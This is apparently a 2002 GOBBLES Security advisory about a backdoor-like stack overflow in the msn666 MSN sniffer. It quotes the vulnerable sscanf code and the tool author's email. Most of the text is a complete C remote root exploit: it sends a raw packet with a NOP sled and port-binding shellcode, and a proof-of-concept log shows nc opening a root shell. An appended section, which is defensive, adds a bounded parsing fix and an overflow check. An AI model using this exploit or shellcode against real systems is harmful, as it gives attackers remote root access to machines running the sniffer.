++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++
++++STILL BACKDOOR IN MSN666 MSN SNIFFER FOR SNIFFING MSN+++++
++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++

+EMERGENCY+++

After disclosing malicious backdoor root hole in msn666 sniffer for sniffing msn yesterday, GOBBLES notice following in he inbox:

...
What about the version posted today?

http://underground.or.kr/project/msn666/msn666-1.0.1.tar.gz

Thanks!
---
Dustin Miller, President
SharePoint Experts, a division of FuseWerx LTD
http://www.sharepointexperts.com/
http://www.fusewerx.com/

Thank you Mr. President! GOBBLES get right on it hehehe ;PPppPP

Then we also see this:

Return-Path:
X-Sieve: cmu-sieve 2.0
Return-Path:
Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.34]) by imap3.hushmail.com (Postfix) with ESMTP id E780E28184E for ; Fri, 14 Jun 2002 08:08:17 -0700 (PDT)
Received: from inhavision.inha.ac.kr (inhavision.inha.ac.kr [165.246.10.162]) by smtp4.hushmail.com (Postfix) with ESMTP id B7A2B3F11; Fri, 14 Jun 2002 08:08:04 -0700 (PDT)
Received: from SEONUS (inhavision.inha.ac.kr [165.246.10.162]) by inhavision.inha.ac.kr (8.11.1/8.11.1) with SMTP id g5EFFJ509086; Sat, 15 Jun 2002 00:15:22 +0900 (KST)
Message-ID: <001801c213b4$b3563e90$6401a8c0@SEONUS>
From: "Seunghyun Seo"
To: ,
Cc: , , , , ,
References: <200206132342.g5DNgvc54973@mailserver4.hushmail.com>
Subject: Re: +ALERT+ BACKDOOR IN MSN666 SNIFFER FOR SNIFFING MSN +ALERT+
Date: Sat, 15 Jun 2002 00:03:46 +0900
Organization: khdp.org, underground.or.kr
MIME-Version: 1.0
Content-Type: text/plain; charset="euc-kr"
Content-Transfer-Encoding: base64
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000

I'm writer of msn666 msn message sniffer, there are no problems, and no backdoors in it, if you read the code and procedure of it in detail then you could notice it rightly.
Check msn666-1.0.0.tar.gz and msn666-1.0.1.tar.gz at http://underground.or.kr/project/msn666/ again. My previous attached file needs revision.
...

And still see bugs? in code... HRM!?!?!

+ALERT+++

Backdoor still present in updated version of msn666 sniffer for sniffing msn.

+DETAILS+++

GOBBLES-scan-incoming detect following in incoming backdoor package of updated msn666 sniffer for sniffing msn version 1.0.1:

msn666.c:

    ...
    void pattern2 ( char *msg, int size )
    {
        char opmsg[16];
        ...
        sscanf ( msg, "%s", &opmsg );
        ...

It still called like this from runpkt():

    ...
    if ( (int)htons(tcp->dest) == 1863 || ok_flg ) {
        ...
        if ( tcp->psh ) {
            memcpy ( buf, data, sizeof(buf) );
            pattern2( buf, htons(ip->tot_len)-40 );
            ...

GOBBLES think it quite obvious this is still malicious root backdoor in msn666 sniffer for sniffing msn. The "%s" conversion carries no field width, so the first whitespace-delimited token of the packet payload is copied into the 16-byte stack buffer opmsg however long it is, and the size argument is never used to bound the copy. Any packet to port 1863 with PSH set reaches this path, and the sniffer runs as root, so this is a remote root stack overflow.

+EXPLOIT CODE+++

Now that GOBBLES save he friends of team bugtraq from malicious backdoor root hole in msn666 sniffer for sniffing msn version 1.0.0 and msn666 sniffer for sniffing msn version 1.0.1 it is time to release he exploit code:

/*
 * disclaimer:
 *
 * GOBBLES SECURITY LABS (GSL) members working
 * on version with -m capabilities. Utilizing libnet.
 *
 * GOBBLES <3 ROUTE
 *
 * This version proves point that even two year
 * old can write remote exploit. Somehow, this
 * horribly written code by Alicia's 2 year old
 * adopted korean nephew works. Remember if you
 * flame this code, you're mocking a 2 year old
 * with more skill than you.
 *
 * There is nothing special about having the ability
 * to write remote root xploits.
 *
 */

/*
 * GOBBLES-own-msn666.c (Quack Sang edition)
 *
 */

// #include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define DADA 0x90

char nappytime[256], treattreat[] =
// GOBBLES use Taeho shellcode because he speak turkey, hehehe
// Hello friend Taeho Oh! Come pick up shirt at Defcon@!@!
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

int main(int argc, char **argv)
{
    struct sockaddr_in playtime;
    struct hostent *poopoo;
    struct iphdr *peepee;
    struct tcphdr *noodlemmm;
    int phewwy, banana, yes = 1;
    char *diaper, *googoo, *store;

    if(argc != 4) {
        fprintf(stdout, "%s \n", argv[0]);
        exit(1);
    }

    sscanf(argv[1], "%p", &store);

    banana = (sizeof(struct iphdr) + sizeof(struct tcphdr) + strlen(treattreat) + sizeof(nappytime) + 24 + 1);

    diaper = malloc(banana);
    googoo = (char *) (diaper + sizeof(struct iphdr) + sizeof(struct tcphdr));
    peepee = (struct iphdr *) diaper;
    noodlemmm = (struct tcphdr *) (diaper + sizeof(struct iphdr));

    memset(diaper, '\0', banana);
    memset(googoo, 'x', 16);
    *(long *)&googoo[16] = (long)store;
    *(long *)&googoo[20] = (long)store;
    memset(nappytime, DADA, sizeof(nappytime));
    memcpy(googoo+24, nappytime, strlen(nappytime));
    memcpy(googoo+24+strlen(nappytime), treattreat, strlen(treattreat));

    if((poopoo = gethostbyname(argv[3])) == NULL) {
        perror(";PPppPPpPp");
        exit(1);
    }

    if((phewwy = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
        perror(";PPpPPpPP");
        exit(1);
    }

    if (setsockopt(phewwy, IPPROTO_IP, IP_HDRINCL, (char *)&yes, sizeof(yes)) == -1) {
        perror(";PPppPPPp");
        exit(1);
    }

    /* hihihihihi */
    peepee->version = 4;
    peepee->ihl = 5;
    peepee->tot_len = htons(banana);
    peepee->id = htons(getpid());
    peepee->frag_off = 0;
    peepee->ttl = 255;
    peepee->protocol = IPPROTO_TCP;
    peepee->check = 0;
    peepee->saddr = inet_addr(argv[2]);
    /* giggle */
    peepee->daddr = inet_addr(inet_ntoa(*((struct in_addr *)poopoo->h_addr)));

    /* dewty diapey?!? */
    noodlemmm->source = htons(9999);
    noodlemmm->dest = htons(1863);
    noodlemmm->seq = random();
    noodlemmm->doff = 5;
    noodlemmm->syn = 0;
    noodlemmm->window = htons(8888);
    noodlemmm->psh = 1;

    playtime.sin_family = AF_INET;
    playtime.sin_port = noodlemmm->dest;
    playtime.sin_addr = *((struct in_addr *)poopoo->h_addr);
    memset(&(playtime.sin_zero), '\0', 8);

    if((sendto(phewwy, diaper, banana, 0, (struct sockaddr *)&playtime, sizeof(struct sockaddr))) == -1) {
        perror(";PPpPPPppPP");
        exit(1);
    } else {
        fprintf(stdout, "!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#\n");
        exit(0);
    }
}

+PROOF OF CONCEPT+++

GOBBLES run msn666 sniffer for sniffing msn version 1.0.1 on he Local Area Network (LAN) once again to prove point:

# ./msn666

Then GOBBLES run he Quack Sang version of GOBBLES-own-msn666.c:

# ./GOBBLES-own-msn666 0xbfffd6d0 192.168.0.1 192.168.0.2
!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#
# nc 192.168.0.2 30464
id
uid=0(root) gid=0(root) groups=0(root)

+GREETZ+++

Dave Ahmed for sorting out the mess for us. Look for us at defcon, we've got a special tshirt just for you!

All our friends who have already emailed us with their thanks for saving them from this sneaky backdoor.

Hopefully, now that the Quack Sang exploit is now private, it'll encourage people to stop running the software and to those naughty people who think sniffing is an ethical action (mailsnarf anyone?), will get what they deserve.

GOBBLES Security
http://www.bugtraq.org
http://www.immunitysec.com/GOBBLES/ <- first official mirror, thanks so much Dave!
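Added example, not code from the msn666 project or from the GOBBLES post: the pattern2() defect quoted under +DETAILS+ restated as a check that reports whether a given payload would overrun opmsg, beside a bounded replacement for the sscanf call. It assumes the token is whitespace-delimited as "%s" implies and that size is the payload length runpkt() passes in; the sample payloads are constructed.

```c
#include <string.h>

#define OPMSG_LEN 16   /* char opmsg[16] in the quoted pattern2() */

/* Whitespace as "%s" treats it in the MSNP command lines msn666 parses. */
static int is_ws(char c) { return c == ' ' || c == '\t' || c == '\r' || c == '\n'; }

/* Index of the first non-whitespace byte within size (size if none). */
static size_t skip_ws(const char *msg, size_t size)
{
    size_t i = 0;
    while (i < size && is_ws(msg[i])) i++;
    return i;
}

/* Length of the first token: exactly what an unbounded sscanf(msg, "%s", ...)
 * would copy. Bounded by size, so it never relies on a NUL terminator,
 * which the memcpy(buf, data, sizeof(buf)) in runpkt() does not guarantee. */
size_t first_token_len(const char *msg, size_t size)
{
    size_t start = skip_ws(msg, size), i = start;
    while (i < size && msg[i] != '\0' && !is_ws(msg[i])) i++;
    return i - start;
}

/* 1 if the original pattern2() would write past opmsg: token plus NUL
 * needs more than OPMSG_LEN bytes. A 15-byte token still fits. */
int pattern2_overflows(const char *msg, size_t size)
{
    return first_token_len(msg, size) + 1 > OPMSG_LEN;
}

/* Bounded replacement for the sscanf call: copies the token into out only
 * when it fits with its NUL, and rejects rather than truncates otherwise.
 * Returns 0 on success, -1 for an empty or oversized token. */
int pattern2_safe(const char *msg, size_t size, char *out, size_t outlen)
{
    size_t start = skip_ws(msg, size);
    size_t len = first_token_len(msg, size);
    if (len == 0 || len + 1 > outlen) return -1;
    memcpy(out, msg + start, len);
    out[len] = '\0';
    return 0;
}

/* Constructed sample payloads (not captured traffic): a normal MSNP command
 * line and one whose first token is 40 bytes. */
const char BENIGN[] = "MSG 12 U\r\n";
const char OVERSIZED[] = "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" " 1 U";
```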